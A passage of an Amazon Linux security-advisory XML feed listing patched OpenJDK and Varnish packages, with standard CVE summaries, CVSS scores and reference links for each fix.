date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-34169:
The Xalan Java XSLT library has an integer truncation issue when processing malicious stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.
CVE-2022-21541:
MethodHandle.invokeBasic() method can be accessed on byte code level from an arbitrary class.
CVE-2022-21540:
Generated code produced by C1 may leak a package-private class to a class from a different package.
CVE-2022-21496:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21476:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
CVE-2022-21443:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21434:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21426:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21365:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21360:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21349:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21341:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21340:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21305:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21299:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21296:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21294:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21293:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21283:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21282:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21248:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21248" title="" id="CVE-2022-21248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21282" title="" id="CVE-2022-21282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21283" title="" id="CVE-2022-21283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21293" title="" id="CVE-2022-21293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21294" title="" id="CVE-2022-21294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21296" title="" id="CVE-2022-21296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21299" title="" id="CVE-2022-21299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21305" title="" id="CVE-2022-21305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21340" title="" id="CVE-2022-21340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21341" title="" id="CVE-2022-21341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21349" title="" id="CVE-2022-21349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21360" title="" id="CVE-2022-21360" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21365" title="" id="CVE-2022-21365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21426" title="" id="CVE-2022-21426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21434" title="" id="CVE-2022-21434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21443" title="" id="CVE-2022-21443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21476" title="" id="CVE-2022-21476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21496" title="" id="CVE-2022-21496" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21540" title="" id="CVE-2022-21540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21541" title="" id="CVE-2022-21541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34169" title="" id="CVE-2022-34169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.342.b07-0.68.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.342.b07-0.68.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1632</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1632: important priority package update for varnish</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23959:
A flaw was found in Varnish. This flaw allows an attacker to carry out a request smuggling attack on HTTP/1 connections on Varnish cache servers. This smuggled request goes through the usual Varnish Configuration Language (VCL) processing since the Varnish server treats it as an additional request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23959" title="" id="CVE-2022-23959" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="varnish-libs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-libs-devel" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-devel-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-docs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-docs-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-debuginfo-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-libs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish-libs-devel" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-devel-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish-docs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-docs-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish-debuginfo" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-debuginfo-4.0.5-3.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1633</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1633: important priority package update for java-1.7.0-openjdk</title><issued date="2022-09-01 17:24:00" /><updated date="2022-09-08 23:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-34169:
The Xalan Java XSLT library has an integer truncation issue when processing malicious stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.
CVE-2022-21541:
MethodHandle.invokeBasic() method can be accessed on byte code level from an arbitrary class.
CVE-2022-21540:
Generated code produced by C1 may leak a package-private class to a class from a different package.
CVE-2022-21496:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21476:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
CVE-2022-21443:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21434:
